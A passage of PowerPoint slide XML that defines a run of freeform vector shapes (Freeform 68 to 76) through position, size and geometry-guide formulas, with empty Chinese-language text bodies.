            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1095" name="Freeform 68"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="482" y="3713"/>
              <a:ext cx="1149" cy="245"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 4 w 3447"/>
                <a:gd name="T1" fmla="*/ 0 h 735"/>
                <a:gd name="T2" fmla="*/ 4 w 3447"/>
                <a:gd name="T3" fmla="*/ 0 h 735"/>
                <a:gd name="T4" fmla="*/ 2 w 3447"/>
                <a:gd name="T5" fmla="*/ 0 h 735"/>
                <a:gd name="T6" fmla="*/ 0 w 3447"/>
                <a:gd name="T7" fmla="*/ 1 h 735"/>
                <a:gd name="T8" fmla="*/ 0 w 3447"/>
                <a:gd name="T9" fmla="*/ 2 h 735"/>
                <a:gd name="T10" fmla="*/ 0 w 3447"/>
                <a:gd name="T11" fmla="*/ 2 h 735"/>
                <a:gd name="T12" fmla="*/ 0 w 3447"/>
                <a:gd name="T13" fmla="*/ 2 h 735"/>
                <a:gd name="T14" fmla="*/ 1 w 3447"/>
                <a:gd name="T15" fmla="*/ 2 h 735"/>
                <a:gd name="T16" fmla="*/ 7 w 3447"/>
                <a:gd name="T17" fmla="*/ 3 h 735"/>
                <a:gd name="T18" fmla="*/ 12 w 3447"/>
                <a:gd name="T19" fmla="*/ 3 h 735"/>
                <a:gd name="T20" fmla="*/ 13 w 3447"/>
                <a:gd name="T21" fmla="*/ 3 h 735"/>
                <a:gd name="T22" fmla="*/ 14 w 3447"/>
                <a:gd name="T23" fmla="*/ 2 h 735"/>
                <a:gd name="T24" fmla="*/ 14 w 3447"/>
                <a:gd name="T25" fmla="*/ 2 h 735"/>
                <a:gd name="T26" fmla="*/ 14 w 3447"/>
                <a:gd name="T27" fmla="*/ 1 h 735"/>
                <a:gd name="T28" fmla="*/ 13 w 3447"/>
                <a:gd name="T29" fmla="*/ 1 h 735"/>
                <a:gd name="T30" fmla="*/ 11 w 3447"/>
                <a:gd name="T31" fmla="*/ 0 h 735"/>
                <a:gd name="T32" fmla="*/ 13 w 3447"/>
                <a:gd name="T33" fmla="*/ 1 h 735"/>
                <a:gd name="T34" fmla="*/ 13 w 3447"/>
                <a:gd name="T35" fmla="*/ 2 h 735"/>
                <a:gd name="T36" fmla="*/ 13 w 3447"/>
                <a:gd name="T37" fmla="*/ 2 h 735"/>
                <a:gd name="T38" fmla="*/ 13 w 3447"/>
                <a:gd name="T39" fmla="*/ 3 h 735"/>
                <a:gd name="T40" fmla="*/ 7 w 3447"/>
                <a:gd name="T41" fmla="*/ 2 h 735"/>
                <a:gd name="T42" fmla="*/ 1 w 3447"/>
                <a:gd name="T43" fmla="*/ 2 h 735"/>
                <a:gd name="T44" fmla="*/ 0 w 3447"/>
                <a:gd name="T45" fmla="*/ 2 h 735"/>
                <a:gd name="T46" fmla="*/ 0 w 3447"/>
                <a:gd name="T47" fmla="*/ 2 h 735"/>
                <a:gd name="T48" fmla="*/ 2 w 3447"/>
                <a:gd name="T49" fmla="*/ 0 h 735"/>
                <a:gd name="T50" fmla="*/ 4 w 3447"/>
                <a:gd name="T51" fmla="*/ 0 h 735"/>
                <a:gd name="T52" fmla="*/ 4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w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1096" name="Freeform 69"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="645" y="2936"/>
              <a:ext cx="857" cy="599"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1 w 2571"/>
                <a:gd name="T1" fmla="*/ 5 h 1796"/>
                <a:gd name="T2" fmla="*/ 0 w 2571"/>
                <a:gd name="T3" fmla="*/ 1 h 1796"/>
                <a:gd name="T4" fmla="*/ 0 w 2571"/>
                <a:gd name="T5" fmla="*/ 1 h 1796"/>
                <a:gd name="T6" fmla="*/ 2 w 2571"/>
                <a:gd name="T7" fmla="*/ 0 h 1796"/>
                <a:gd name="T8" fmla="*/ 6 w 2571"/>
                <a:gd name="T9" fmla="*/ 0 h 1796"/>
                <a:gd name="T10" fmla="*/ 9 w 2571"/>
                <a:gd name="T11" fmla="*/ 0 h 1796"/>
                <a:gd name="T12" fmla="*/ 10 w 2571"/>
                <a:gd name="T13" fmla="*/ 1 h 1796"/>
                <a:gd name="T14" fmla="*/ 11 w 2571"/>
                <a:gd name="T15" fmla="*/ 1 h 1796"/>
                <a:gd name="T16" fmla="*/ 11 w 2571"/>
                <a:gd name="T17" fmla="*/ 4 h 1796"/>
                <a:gd name="T18" fmla="*/ 9 w 2571"/>
                <a:gd name="T19" fmla="*/ 7 h 1796"/>
                <a:gd name="T20" fmla="*/ 10 w 2571"/>
                <a:gd name="T21" fmla="*/ 4 h 1796"/>
                <a:gd name="T22" fmla="*/ 10 w 2571"/>
                <a:gd name="T23" fmla="*/ 1 h 1796"/>
                <a:gd name="T24" fmla="*/ 10 w 2571"/>
                <a:gd name="T25" fmla="*/ 3 h 1796"/>
                <a:gd name="T26" fmla="*/ 9 w 2571"/>
                <a:gd name="T27" fmla="*/ 6 h 1796"/>
                <a:gd name="T28" fmla="*/ 9 w 2571"/>
                <a:gd name="T29" fmla="*/ 7 h 1796"/>
                <a:gd name="T30" fmla="*/ 9 w 2571"/>
                <a:gd name="T31" fmla="*/ 5 h 1796"/>
                <a:gd name="T32" fmla="*/ 10 w 2571"/>
                <a:gd name="T33" fmla="*/ 2 h 1796"/>
                <a:gd name="T34" fmla="*/ 10 w 2571"/>
                <a:gd name="T35" fmla="*/ 1 h 1796"/>
                <a:gd name="T36" fmla="*/ 9 w 2571"/>
                <a:gd name="T37" fmla="*/ 1 h 1796"/>
                <a:gd name="T38" fmla="*/ 8 w 2571"/>
                <a:gd name="T39" fmla="*/ 0 h 1796"/>
                <a:gd name="T40" fmla="*/ 6 w 2571"/>
                <a:gd name="T41" fmla="*/ 0 h 1796"/>
                <a:gd name="T42" fmla="*/ 3 w 2571"/>
                <a:gd name="T43" fmla="*/ 0 h 1796"/>
                <a:gd name="T44" fmla="*/ 0 w 2571"/>
                <a:gd name="T45" fmla="*/ 1 h 1796"/>
                <a:gd name="T46" fmla="*/ 0 w 2571"/>
                <a:gd name="T47" fmla="*/ 1 h 1796"/>
                <a:gd name="T48" fmla="*/ 1 w 2571"/>
                <a:gd name="T49" fmla="*/ 5 h 1796"/>
                <a:gd name="T50" fmla="*/ 1 w 2571"/>
                <a:gd name="T51" fmla="*/ 5 h 1796"/>
                <a:gd name="T52" fmla="*/ 1 w 2571"/>
                <a:gd name="T53" fmla="*/ 5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w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1097" name="Freeform 70"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="710" y="3348"/>
              <a:ext cx="800" cy="375"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 2400"/>
                <a:gd name="T1" fmla="*/ 1 h 1125"/>
                <a:gd name="T2" fmla="*/ 0 w 2400"/>
                <a:gd name="T3" fmla="*/ 1 h 1125"/>
                <a:gd name="T4" fmla="*/ 1 w 2400"/>
                <a:gd name="T5" fmla="*/ 3 h 1125"/>
                <a:gd name="T6" fmla="*/ 1 w 2400"/>
                <a:gd name="T7" fmla="*/ 4 h 1125"/>
                <a:gd name="T8" fmla="*/ 3 w 2400"/>
                <a:gd name="T9" fmla="*/ 4 h 1125"/>
                <a:gd name="T10" fmla="*/ 6 w 2400"/>
                <a:gd name="T11" fmla="*/ 4 h 1125"/>
                <a:gd name="T12" fmla="*/ 7 w 2400"/>
                <a:gd name="T13" fmla="*/ 4 h 1125"/>
                <a:gd name="T14" fmla="*/ 8 w 2400"/>
                <a:gd name="T15" fmla="*/ 2 h 1125"/>
                <a:gd name="T16" fmla="*/ 8 w 2400"/>
                <a:gd name="T17" fmla="*/ 4 h 1125"/>
                <a:gd name="T18" fmla="*/ 8 w 2400"/>
                <a:gd name="T19" fmla="*/ 4 h 1125"/>
                <a:gd name="T20" fmla="*/ 9 w 2400"/>
                <a:gd name="T21" fmla="*/ 4 h 1125"/>
                <a:gd name="T22" fmla="*/ 10 w 2400"/>
                <a:gd name="T23" fmla="*/ 1 h 1125"/>
                <a:gd name="T24" fmla="*/ 9 w 2400"/>
                <a:gd name="T25" fmla="*/ 0 h 1125"/>
                <a:gd name="T26" fmla="*/ 9 w 2400"/>
                <a:gd name="T27" fmla="*/ 0 h 1125"/>
                <a:gd name="T28" fmla="*/ 10 w 2400"/>
                <a:gd name="T29" fmla="*/ 1 h 1125"/>
                <a:gd name="T30" fmla="*/ 9 w 2400"/>
                <a:gd name="T31" fmla="*/ 4 h 1125"/>
                <a:gd name="T32" fmla="*/ 9 w 2400"/>
                <a:gd name="T33" fmla="*/ 4 h 1125"/>
                <a:gd name="T34" fmla="*/ 8 w 2400"/>
                <a:gd name="T35" fmla="*/ 5 h 1125"/>
                <a:gd name="T36" fmla="*/ 8 w 2400"/>
                <a:gd name="T37" fmla="*/ 4 h 1125"/>
                <a:gd name="T38" fmla="*/ 7 w 2400"/>
                <a:gd name="T39" fmla="*/ 4 h 1125"/>
                <a:gd name="T40" fmla="*/ 7 w 2400"/>
                <a:gd name="T41" fmla="*/ 4 h 1125"/>
                <a:gd name="T42" fmla="*/ 6 w 2400"/>
                <a:gd name="T43" fmla="*/ 4 h 1125"/>
                <a:gd name="T44" fmla="*/ 3 w 2400"/>
                <a:gd name="T45" fmla="*/ 4 h 1125"/>
                <a:gd name="T46" fmla="*/ 2 w 2400"/>
                <a:gd name="T47" fmla="*/ 4 h 1125"/>
                <a:gd name="T48" fmla="*/ 1 w 2400"/>
                <a:gd name="T49" fmla="*/ 4 h 1125"/>
                <a:gd name="T50" fmla="*/ 0 w 2400"/>
                <a:gd name="T51" fmla="*/ 3 h 1125"/>
                <a:gd name="T52" fmla="*/ 0 w 2400"/>
                <a:gd name="T53" fmla="*/ 1 h 1125"/>
                <a:gd name="T54" fmla="*/ 0 w 2400"/>
                <a:gd name="T55" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1098" name="Freeform 71"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="787" y="3660"/>
              <a:ext cx="132" cy="77"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 396"/>
                <a:gd name="T1" fmla="*/ 1 h 232"/>
                <a:gd name="T2" fmla="*/ 0 w 396"/>
                <a:gd name="T3" fmla="*/ 1 h 232"/>
                <a:gd name="T4" fmla="*/ 1 w 396"/>
                <a:gd name="T5" fmla="*/ 1 h 232"/>
                <a:gd name="T6" fmla="*/ 2 w 396"/>
                <a:gd name="T7" fmla="*/ 0 h 232"/>
                <a:gd name="T8" fmla="*/ 2 w 396"/>
                <a:gd name="T9" fmla="*/ 0 h 232"/>
                <a:gd name="T10" fmla="*/ 1 w 396"/>
                <a:gd name="T11" fmla="*/ 1 h 232"/>
                <a:gd name="T12" fmla="*/ 1 w 396"/>
                <a:gd name="T13" fmla="*/ 1 h 232"/>
                <a:gd name="T14" fmla="*/ 0 w 396"/>
                <a:gd name="T15" fmla="*/ 1 h 232"/>
                <a:gd name="T16" fmla="*/ 0 w 396"/>
                <a:gd name="T17" fmla="*/ 1 h 232"/>
                <a:gd name="T18" fmla="*/ 0 w 396"/>
                <a:gd name="T19" fmla="*/ 1 h 232"/>
                <a:gd name="T20" fmla="*/ 0 w 396"/>
                <a:gd name="T21" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1099" name="Freeform 72"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="928" y="3687"/>
              <a:ext cx="476" cy="67"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 1427"/>
                <a:gd name="T1" fmla="*/ 1 h 201"/>
                <a:gd name="T2" fmla="*/ 6 w 1427"/>
                <a:gd name="T3" fmla="*/ 1 h 201"/>
                <a:gd name="T4" fmla="*/ 6 w 1427"/>
                <a:gd name="T5" fmla="*/ 1 h 201"/>
                <a:gd name="T6" fmla="*/ 5 w 1427"/>
                <a:gd name="T7" fmla="*/ 0 h 201"/>
                <a:gd name="T8" fmla="*/ 4 w 1427"/>
                <a:gd name="T9" fmla="*/ 0 h 201"/>
                <a:gd name="T10" fmla="*/ 4 w 1427"/>
                <a:gd name="T11" fmla="*/ 0 h 201"/>
                <a:gd name="T12" fmla="*/ 2 w 1427"/>
                <a:gd name="T13" fmla="*/ 0 h 201"/>
                <a:gd name="T14" fmla="*/ 0 w 1427"/>
                <a:gd name="T15" fmla="*/ 1 h 201"/>
                <a:gd name="T16" fmla="*/ 0 w 1427"/>
                <a:gd name="T17" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1100" name="Freeform 73"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="623" y="3814"/>
              <a:ext cx="567" cy="65"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 1701"/>
                <a:gd name="T1" fmla="*/ 0 h 194"/>
                <a:gd name="T2" fmla="*/ 0 w 1701"/>
                <a:gd name="T3" fmla="*/ 0 h 194"/>
                <a:gd name="T4" fmla="*/ 1 w 1701"/>
                <a:gd name="T5" fmla="*/ 0 h 194"/>
                <a:gd name="T6" fmla="*/ 1 w 1701"/>
                <a:gd name="T7" fmla="*/ 0 h 194"/>
                <a:gd name="T8" fmla="*/ 2 w 1701"/>
                <a:gd name="T9" fmla="*/ 0 h 194"/>
                <a:gd name="T10" fmla="*/ 2 w 1701"/>
                <a:gd name="T11" fmla="*/ 0 h 194"/>
                <a:gd name="T12" fmla="*/ 3 w 1701"/>
                <a:gd name="T13" fmla="*/ 0 h 194"/>
                <a:gd name="T14" fmla="*/ 3 w 1701"/>
                <a:gd name="T15" fmla="*/ 0 h 194"/>
                <a:gd name="T16" fmla="*/ 4 w 1701"/>
                <a:gd name="T17" fmla="*/ 0 h 194"/>
                <a:gd name="T18" fmla="*/ 4 w 1701"/>
                <a:gd name="T19" fmla="*/ 0 h 194"/>
                <a:gd name="T20" fmla="*/ 4 w 1701"/>
                <a:gd name="T21" fmla="*/ 0 h 194"/>
                <a:gd name="T22" fmla="*/ 5 w 1701"/>
                <a:gd name="T23" fmla="*/ 0 h 194"/>
                <a:gd name="T24" fmla="*/ 5 w 1701"/>
                <a:gd name="T25" fmla="*/ 0 h 194"/>
                <a:gd name="T26" fmla="*/ 6 w 1701"/>
                <a:gd name="T27" fmla="*/ 0 h 194"/>
                <a:gd name="T28" fmla="*/ 7 w 1701"/>
                <a:gd name="T29" fmla="*/ 0 h 194"/>
                <a:gd name="T30" fmla="*/ 7 w 1701"/>
                <a:gd name="T31" fmla="*/ 1 h 194"/>
                <a:gd name="T32" fmla="*/ 7 w 1701"/>
                <a:gd name="T33" fmla="*/ 1 h 194"/>
                <a:gd name="T34" fmla="*/ 6 w 1701"/>
                <a:gd name="T35" fmla="*/ 1 h 194"/>
                <a:gd name="T36" fmla="*/ 6 w 1701"/>
                <a:gd name="T37" fmla="*/ 1 h 194"/>
                <a:gd name="T38" fmla="*/ 5 w 1701"/>
                <a:gd name="T39" fmla="*/ 1 h 194"/>
                <a:gd name="T40" fmla="*/ 5 w 1701"/>
                <a:gd name="T41" fmla="*/ 0 h 194"/>
                <a:gd name="T42" fmla="*/ 4 w 1701"/>
                <a:gd name="T43" fmla="*/ 0 h 194"/>
                <a:gd name="T44" fmla="*/ 4 w 1701"/>
                <a:gd name="T45" fmla="*/ 1 h 194"/>
                <a:gd name="T46" fmla="*/ 4 w 1701"/>
                <a:gd name="T47" fmla="*/ 1 h 194"/>
                <a:gd name="T48" fmla="*/ 4 w 1701"/>
                <a:gd name="T49" fmla="*/ 0 h 194"/>
                <a:gd name="T50" fmla="*/ 3 w 1701"/>
                <a:gd name="T51" fmla="*/ 0 h 194"/>
                <a:gd name="T52" fmla="*/ 3 w 1701"/>
                <a:gd name="T53" fmla="*/ 1 h 194"/>
                <a:gd name="T54" fmla="*/ 2 w 1701"/>
                <a:gd name="T55" fmla="*/ 1 h 194"/>
                <a:gd name="T56" fmla="*/ 2 w 1701"/>
                <a:gd name="T57" fmla="*/ 0 h 194"/>
                <a:gd name="T58" fmla="*/ 2 w 1701"/>
                <a:gd name="T59" fmla="*/ 0 h 194"/>
                <a:gd name="T60" fmla="*/ 1 w 1701"/>
                <a:gd name="T61" fmla="*/ 1 h 194"/>
                <a:gd name="T62" fmla="*/ 1 w 1701"/>
                <a:gd name="T63" fmla="*/ 1 h 194"/>
                <a:gd name="T64" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1101" name="Freeform 74"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="942" y="3793"/>
              <a:ext cx="507" cy="57"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 1521"/>
                <a:gd name="T1" fmla="*/ 0 h 173"/>
                <a:gd name="T2" fmla="*/ 0 w 1521"/>
                <a:gd name="T3" fmla="*/ 0 h 173"/>
                <a:gd name="T4" fmla="*/ 1 w 1521"/>
                <a:gd name="T5" fmla="*/ 0 h 173"/>
                <a:gd name="T6" fmla="*/ 1 w 1521"/>
                <a:gd name="T7" fmla="*/ 0 h 173"/>
                <a:gd name="T8" fmla="*/ 1 w 1521"/>
                <a:gd name="T9" fmla="*/ 0 h 173"/>
                <a:gd name="T10" fmla="*/ 2 w 1521"/>
                <a:gd name="T11" fmla="*/ 0 h 173"/>
                <a:gd name="T12" fmla="*/ 2 w 1521"/>
                <a:gd name="T13" fmla="*/ 0 h 173"/>
                <a:gd name="T14" fmla="*/ 3 w 1521"/>
                <a:gd name="T15" fmla="*/ 0 h 173"/>
                <a:gd name="T16" fmla="*/ 3 w 1521"/>
                <a:gd name="T17" fmla="*/ 0 h 173"/>
                <a:gd name="T18" fmla="*/ 4 w 1521"/>
                <a:gd name="T19" fmla="*/ 0 h 173"/>
                <a:gd name="T20" fmla="*/ 4 w 1521"/>
                <a:gd name="T21" fmla="*/ 0 h 173"/>
                <a:gd name="T22" fmla="*/ 5 w 1521"/>
                <a:gd name="T23" fmla="*/ 0 h 173"/>
                <a:gd name="T24" fmla="*/ 5 w 1521"/>
                <a:gd name="T25" fmla="*/ 0 h 173"/>
                <a:gd name="T26" fmla="*/ 5 w 1521"/>
                <a:gd name="T27" fmla="*/ 0 h 173"/>
                <a:gd name="T28" fmla="*/ 6 w 1521"/>
                <a:gd name="T29" fmla="*/ 0 h 173"/>
                <a:gd name="T30" fmla="*/ 6 w 1521"/>
                <a:gd name="T31" fmla="*/ 1 h 173"/>
                <a:gd name="T32" fmla="*/ 6 w 1521"/>
                <a:gd name="T33" fmla="*/ 1 h 173"/>
                <a:gd name="T34" fmla="*/ 6 w 1521"/>
                <a:gd name="T35" fmla="*/ 0 h 173"/>
                <a:gd name="T36" fmla="*/ 5 w 1521"/>
                <a:gd name="T37" fmla="*/ 0 h 173"/>
                <a:gd name="T38" fmla="*/ 5 w 1521"/>
                <a:gd name="T39" fmla="*/ 1 h 173"/>
                <a:gd name="T40" fmla="*/ 4 w 1521"/>
                <a:gd name="T41" fmla="*/ 0 h 173"/>
                <a:gd name="T42" fmla="*/ 4 w 1521"/>
                <a:gd name="T43" fmla="*/ 0 h 173"/>
                <a:gd name="T44" fmla="*/ 4 w 1521"/>
                <a:gd name="T45" fmla="*/ 1 h 173"/>
                <a:gd name="T46" fmla="*/ 3 w 1521"/>
                <a:gd name="T47" fmla="*/ 1 h 173"/>
                <a:gd name="T48" fmla="*/ 3 w 1521"/>
                <a:gd name="T49" fmla="*/ 0 h 173"/>
                <a:gd name="T50" fmla="*/ 3 w 1521"/>
                <a:gd name="T51" fmla="*/ 0 h 173"/>
                <a:gd name="T52" fmla="*/ 3 w 1521"/>
                <a:gd name="T53" fmla="*/ 1 h 173"/>
                <a:gd name="T54" fmla="*/ 2 w 1521"/>
                <a:gd name="T55" fmla="*/ 1 h 173"/>
                <a:gd name="T56" fmla="*/ 2 w 1521"/>
                <a:gd name="T57" fmla="*/ 0 h 173"/>
                <a:gd name="T58" fmla="*/ 1 w 1521"/>
                <a:gd name="T59" fmla="*/ 0 h 173"/>
                <a:gd name="T60" fmla="*/ 1 w 1521"/>
                <a:gd name="T61" fmla="*/ 1 h 173"/>
                <a:gd name="T62" fmla="*/ 1 w 1521"/>
                <a:gd name="T63" fmla="*/ 0 h 173"/>
                <a:gd name="T64" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1102" name="Freeform 75"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="798" y="3748"/>
              <a:ext cx="507" cy="57"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 1521"/>
                <a:gd name="T1" fmla="*/ 0 h 172"/>
                <a:gd name="T2" fmla="*/ 0 w 1521"/>
                <a:gd name="T3" fmla="*/ 0 h 172"/>
                <a:gd name="T4" fmla="*/ 1 w 1521"/>
                <a:gd name="T5" fmla="*/ 0 h 172"/>
                <a:gd name="T6" fmla="*/ 1 w 1521"/>
                <a:gd name="T7" fmla="*/ 0 h 172"/>
                <a:gd name="T8" fmla="*/ 1 w 1521"/>
                <a:gd name="T9" fmla="*/ 0 h 172"/>
                <a:gd name="T10" fmla="*/ 2 w 1521"/>
                <a:gd name="T11" fmla="*/ 0 h 172"/>
                <a:gd name="T12" fmla="*/ 2 w 1521"/>
                <a:gd name="T13" fmla="*/ 0 h 172"/>
                <a:gd name="T14" fmla="*/ 3 w 1521"/>
                <a:gd name="T15" fmla="*/ 0 h 172"/>
                <a:gd name="T16" fmla="*/ 3 w 1521"/>
                <a:gd name="T17" fmla="*/ 0 h 172"/>
                <a:gd name="T18" fmla="*/ 4 w 1521"/>
                <a:gd name="T19" fmla="*/ 0 h 172"/>
                <a:gd name="T20" fmla="*/ 4 w 1521"/>
                <a:gd name="T21" fmla="*/ 0 h 172"/>
                <a:gd name="T22" fmla="*/ 5 w 1521"/>
                <a:gd name="T23" fmla="*/ 0 h 172"/>
                <a:gd name="T24" fmla="*/ 5 w 1521"/>
                <a:gd name="T25" fmla="*/ 0 h 172"/>
                <a:gd name="T26" fmla="*/ 5 w 1521"/>
                <a:gd name="T27" fmla="*/ 0 h 172"/>
                <a:gd name="T28" fmla="*/ 6 w 1521"/>
                <a:gd name="T29" fmla="*/ 0 h 172"/>
                <a:gd name="T30" fmla="*/ 6 w 1521"/>
                <a:gd name="T31" fmla="*/ 1 h 172"/>
                <a:gd name="T32" fmla="*/ 6 w 1521"/>
                <a:gd name="T33" fmla="*/ 1 h 172"/>
                <a:gd name="T34" fmla="*/ 6 w 1521"/>
                <a:gd name="T35" fmla="*/ 0 h 172"/>
                <a:gd name="T36" fmla="*/ 5 w 1521"/>
                <a:gd name="T37" fmla="*/ 0 h 172"/>
                <a:gd name="T38" fmla="*/ 5 w 1521"/>
                <a:gd name="T39" fmla="*/ 1 h 172"/>
                <a:gd name="T40" fmla="*/ 4 w 1521"/>
                <a:gd name="T41" fmla="*/ 0 h 172"/>
                <a:gd name="T42" fmla="*/ 4 w 1521"/>
                <a:gd name="T43" fmla="*/ 0 h 172"/>
                <a:gd name="T44" fmla="*/ 4 w 1521"/>
                <a:gd name="T45" fmla="*/ 1 h 172"/>
                <a:gd name="T46" fmla="*/ 3 w 1521"/>
                <a:gd name="T47" fmla="*/ 1 h 172"/>
                <a:gd name="T48" fmla="*/ 3 w 1521"/>
                <a:gd name="T49" fmla="*/ 0 h 172"/>
                <a:gd name="T50" fmla="*/ 3 w 1521"/>
                <a:gd name="T51" fmla="*/ 0 h 172"/>
                <a:gd name="T52" fmla="*/ 2 w 1521"/>
                <a:gd name="T53" fmla="*/ 1 h 172"/>
                <a:gd name="T54" fmla="*/ 2 w 1521"/>
                <a:gd name="T55" fmla="*/ 1 h 172"/>
                <a:gd name="T56" fmla="*/ 2 w 1521"/>
                <a:gd name="T57" fmla="*/ 0 h 172"/>
                <a:gd name="T58" fmla="*/ 1 w 1521"/>
                <a:gd name="T59" fmla="*/ 0 h 172"/>
                <a:gd name="T60" fmla="*/ 1 w 1521"/>
                <a:gd name="T61" fmla="*/ 1 h 172"/>
                <a:gd name="T62" fmla="*/ 1 w 1521"/>
                <a:gd name="T63" fmla="*/ 0 h 172"/>
                <a:gd name="T64" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1103" name="Freeform 76"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="846" y="3194"/>
              <a:ext cx="114" cy="43"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 342"/>
                <a:gd name="T1" fmla="*/ 0 h 131"/>
                <a:gd name="T2" fmla="*/ 0 w 342"/>
                <a:gd name="T3" fmla="*/ 1 h 131"/>
                <a:gd name="T4" fmla="*/ 1 w 342"/>
                <a:gd name="T5" fmla="*/ 0 h 131"/>
                <a:gd name="T6" fmla="*/ 1 w 342"/>
                <a:gd name="T7" fmla="*/ 0 h 131"/>
                <a:gd name="T8" fmla="*/ 1 w 342"/>
                <a:gd name="T9" fmla="*/ 0 h 131"/>
                <a:gd name="T10" fmla="*/ 1 w 342"/>
                <a:gd name="T11" fmla="*/ 0 h 131"/>
                <a:gd name="T12" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
